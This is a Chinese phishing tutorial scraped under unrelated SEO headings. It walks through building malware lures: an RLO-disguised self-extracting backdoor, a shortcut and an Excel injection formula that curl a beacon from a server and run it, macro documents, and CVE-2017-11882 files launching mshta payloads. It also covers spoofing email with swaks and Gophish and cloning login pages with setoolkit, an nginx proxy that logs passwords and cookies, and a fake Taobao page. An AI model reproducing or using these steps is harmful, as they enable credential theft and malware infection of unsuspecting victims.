网站需要域名吗游戏网站开发毕业设计

网站需要域名吗,游戏网站开发毕业设计,展馆展示设计公司哪家好一点,营销活动策划方案模板一、什么是网络钓鱼 网络钓鱼是通过伪造银行或其他知名机构向他人发送垃圾邮件#xff0c;意图引诱收信人给出敏感信息(如用户名、口令、帐号 ID 、 ATM PIN 码或信用卡详细信息)的一种攻击方式。 二、网络钓鱼的基本流程 钓鱼一般分为三个步骤#xff1a;寻找大鱼#x…一、什么是网络钓鱼网络钓鱼是通过伪造银行或其他知名机构向他人发送垃圾邮件意图引诱收信人给出敏感信息(如用户名、口令、帐号 ID 、 ATM PIN 码或信用卡详细信息)的一种攻击方式。二、网络钓鱼的基本流程钓鱼一般分为三个步骤寻找大鱼制作鱼饵和抛竿寻找大鱼我们的目标一般包括 HR、销售、文员等安全意识比较薄弱的人员以及运维、开发等掌握重要资源的人员。制作鱼饵一个高质量鱼饵一般分为两部分一个是邮件内容更加的逼真可信另一个是邮件的附件尽可能伪装的正常抛竿最后把鱼竿抛出后就可以坐等鱼上钩了三、如何制作高质量鱼饵0x01.自解压RLO制作思路利用自解压文件的特性解压后令其自动执行解压出来的文件达到上线的目的由于自解压文件后缀为exe很容易被识破所以我们还需使用RLO后缀反转进行一些伪装。步骤一用cs生成windows后门步骤二随便准备一张图片使用WinRAR把后门和图片一块自解压压缩文件时需在高级——自解压选项中进行一些的设置使木马的执行更加隐蔽常规——解压路径C:\windows\temp设置——解压后运行C:\windows\temp\artifact.exeC:\windows\temp\壁纸.jpg模式——全部隐藏更新——更新模式——解压并更新文件更新——覆盖模式——覆盖所有文件步骤三使用resourcehacker更换文件图标,将其伪装成图片步骤四把文件重命名为壁纸gpj.exe再使用RLO对后缀进行反转最后效果如下结合邮件钓鱼等方式把“图片”放送给他人引诱他人上钩对方双击“图片”后会同时执行artifact.exe和壁纸.jpg而且上线cs02.快捷方式制作思路运行快捷键方式时执行命令让其下载我们提前放在服务器上的后门程序并且运行步骤一cs生成后门放到服务器网站目录下步骤二创建快捷方式在目标中写入以下代码C:\Windows\System32\cmd.exe /k curl http://xxx.xxx.xxx.xxx/exe/artifact.exe --output C:\Windows\temp\win.exe C:\Windows\temp\win.exe步骤三更换图标增加其真实性当对方双击快捷键方式时就会下载我们准备好的artifact.exe并且执行03.Word宏病毒宏病毒是Word中被嵌入的带有恶意行为的宏代码VBA代码当我们双击打开带有宏病毒的word文档的时候它的宏代码会自动运行。步骤一使用cs生成恶意vba代码步骤二新建doc文档创建宏保存即可步骤三再次打开文件后提示是否启用宏点击启用就会上线cs04.Excel注入Excel注入是一种将包含恶意命令的excel公式插入到可以导出csv或xls等格式的文本中当在excel中打开xls文件时文件会转换为excel格式并提供excel公式的执行功能从而造成命令执行。利用excel注入弹出计算器注入代码cmd| /c calc! !A1利用excel注入上线cs步骤一使用cs生成exe后门并放到服务器上步骤二更换恶意代码cmd| /c curl http://xxx.xxx.xxx.xxx/beacon.exe --output C:\Windows\temp\win.exe C:\Windows\temp\win.exe ! A1当双击打开该excel时就会执行恶意代码下载cs后门并运行 上线cs05.CVE-2017-11882cve-2017-11882漏洞也是word钓鱼的一种方式相比宏病毒更加的隐蔽把word伪装成某某通知文件目标点击后就直接可以直接上线。利用cve-2017-11882弹出计算器下载pochttps://github.com/Ridter/CVE-2017-11882生成带有病毒的word文件python2 Command109b_CVE-2017-11882.py -c cmd.exe /c calc.exe -o test.doc双击test.doc弹出计算器利用cve-2017-11882上线msf步骤一使用exploit/windows/misc/hta_server生成病毒use exploit/windows/misc/hta_server set payload windows/meterpreter/reverse_http set lport 4444 show options exploit步骤二生成带病毒的doc文件并伪装为通知文件python2 Command109b_CVE-2017-11882.py -c mshta http://192.168.126.132:8080/Uf7DGFz.hta -o 通知文件.doc -i input.rtf受害人打开wordmsf就会上线shell四、邮件伪造SwaksSwaks是kali自带的一款邮件伪造工具通过swaks可以向任意目标发送任意内容的邮件swaks的用法 --from 发件人的邮箱 --ehlo 伪造邮件头 --body 邮件正文内容 --header 邮件头信息subject为邮件标题 --data 源邮件 --attach 附件文件给指定邮箱发送邮件swaks --to seyoulalachacuo.net --from A公司 --ehlo 中奖通知 --body 秉承“正德厚生臻于至善”的企业核心价值观立足发展真情回馈社会和客户。全体员工祝贺您在此活动中获得一等奖。再次感谢您对本公司的关信和支持本信仅为中奖凭证具体细节见注意事项。 --header Subject: 中奖通知现在的邮箱都有某种检测机制要想他人发邮件这种方法就不太行了GophishGophish是一个开源的钓鱼工具包自带web面板对于邮件编辑、网站克隆、数据可视化、批量发送等功能的使用带来的极大的便捷。伪造中奖通知邮件发送附件效果看着还可以文件再免杀一下就更好了第二种方法邮件正文中插入克隆网站然后克隆一个qq邮箱的登录页面引诱其输入账户密码如果对方提交输入账户密码就会在gophish中显示出来五、网站克隆01、setoolkit说到克隆网站kali上自带的setoolkit给我们提供了很大的方便不仅可以记录用户提交的数据还可以进行注入攻击setoolkit克隆网站1、启动setoolkit选者1社工攻击1) Social-Engineering Attacks【社工攻击(常用)】 2) Penetration Testing (Fast-Track)【渗透测试快速的】 3) Third Party Modules【第三方模块】 4) Update the Social-Engineer Toolkit【更新社工工具包】 5) Update SET configuration【升级配置】 6) Help, Credits, and About【帮助】2、随后选择2web网站式攻击-钓鱼1) Spear-Phishing Attack Vectors【鱼叉式网络钓鱼攻击】 2) Website Attack Vectors【web网站式攻击-钓鱼(常用)】 3) Infectious Media Generator【传染性木马】 4) Create a Payload and Listener【创建payload和监听器】 5) Mass Mailer Attack【邮件群发攻击】 6) Arduino-Based Attack Vector【基于安卓的攻击】 7) Wireless Access Point Attack Vector【wifi攻击】 8) QRCode Generator Attack Vector【生成二维码(就普通二维码)】 9) Powershell Attack Vectors【Powershell攻击】 10) Third Party Modules【第三方模块】3、选择3凭证攻击1) Java Applet Attack Method【java小程序攻击】 2) Metasploit Browser Exploit Method【Metasploit浏览器利用】 3) Credential Harvester Attack Method【凭证攻击(常用)】 4) Tabnabbing Attack Method【Tabnabbing攻击】 5) Web Jacking Attack Method【web劫持】 6) Multi-Attack Web Method【web多重攻击】 7) HTA Attack Method【HTA攻击】4、最后选择2网站克隆1) Web Templates【web模板】 2) Site Cloner【克隆网站】 3) Custom Import【自定义导入】5、ip默认即可最后输入要克隆的站点6、访问攻击者的ip就可以看到克隆的站点当用户输入账户密码时就会被记录setoolkit HTA注入攻击先使用setoolkit克隆一个站点当用户点击运行脚本的时候会触发反弹一个Shell。1、启动setoolkit并选择1社工攻击2、然后选择2web网站式攻击-钓鱼3、随后选择7HTA攻击4、选择2克隆网站5、输入克隆的站点监听ip和端口默认就行最后还需选择一个攻击载荷 Meterpreter Reverse TCP当攻击者访问攻击机的ip时就会弹出弹窗并且上线shell02、nginx反向代理克隆镜像网站nginx有个反向代理功能将客户端的请求均匀地分配到后端的多个业务服务器进行处理nginx再将执行结果返回给客户端以此来解决网站流量过大的问题。利用nginx反向代理克隆生成镜像网站就是通过反向代理将请求分发到一个不属于我们的网站去处理最后将处理的结果再通过nginx返回给用户。1、打开nginx配置⽂件/www/server/nginx/conf/nginx.conf 在http处添加以下配置指定日志的存储内容。log_format Clonelog escapejson {$remote_addr| $request_filename| $request_body| $http_cookie| $http_x_forwarded_for| $time_local};2、在/www/server/panel/vhost/nginx/目录下新增clone.conf做如下配置生成镜像网站server { listen 8000; server_name 127.0.0.1; index index.html index.htm index.php; access_log /www/wwwlogs/access.log Clonelog; location / { proxy_pass http://xxx.xxx.com; proxy_buffering off; proxy_set_header X-Real-Ip $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; proxy_set_header Host xxx.xxx.com; proxy_set_header Accept-Encoding ; proxy_set_header User-Agent $http_user_agent; proxy_set_header referer http://xxx.xxx.com$request_uri; } }server_name 监听的域名。access_log 设置输出⽇志的路径最后面是我们配置的日志输出格式 。proxy_pass 反向代理的⽹站 。proxy_set_header ⽤于在向反向代理的后端 Web 服务器发起请求时 添加指定的 Header头信息。access_log 要和上⾯的nginx.conf 配置中的Clonelog 对应不然⽇志 不会起作⽤。重点是r e q u e s t _ b o d y ( 获取 p o s t 数据 ) request\_body (获取post数据)request_body(获取post数据)http_cookie (获取cookie数据)这就是我们钓⻥的核⼼了。当有⼈访问并登陆我们反向代理的⽹站以 后 我们点开⽇志就可以看到他的cookie和post提交的⽤户名和密码了。3、重新加载nginx配置文件nginx -s reload4、访问克隆网站查看效果4、如果用户提交账户密码就会被日志文件记录日志文件位置/www/wwwlogs/access.log03、前端页面克隆先找一个大型网站带登录界面的那种用ctrls将网站前端代码保存下来再把后台功能稍加修改这样我们的钓鱼网站在界面上差不多就可以做到以假乱真了。以某宝官网为目标使用ctrls把网站前端代码保存下来但是放到网站目录下访问却会出现一些偏差密码框被拉长了经过一番调试需要把密码框前的标签中的id属性删除再访问就不会有问题了现在两个界面除了url以外其他的地方基本上都一样了使用F12寻找原网站的账号密码在form标签中的name值账号的name值:logonId密码的name值:password_rsainput把表单内容提交到check.php为了保证真实性让用户在第一次输入完账户密码后弹一个“该账户不存在或登录密码出错已达上限请更换账户。”然后再跳转到真实网址上。但是只修改这部分会出现问题就是只能接收到账号接收不到密码经排查需要将密码的name值做修改不能使用网页原来的值,这里将其修改为passwordaa确保不会重复Check.php里也需要修改再尝试登录钓鱼网站成功接收到了用户输入的账号密码不过这样用户名密码的查看并不方便写个show.php来进行展示为了使网站跟看起来更真实还可以购买域名进行一些伪装网络安全学习资源分享:给大家分享一份全套的网络安全学习资料给那些想学习 网络安全的小伙伴们一点帮助对于从来没有接触过网络安全的同学我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线大家跟着这个大的方向学习准没问题。因篇幅有限仅展示部分资料朋友们如果有需要全套《网络安全入门进阶学习资源包》请看下方扫描即可前往获取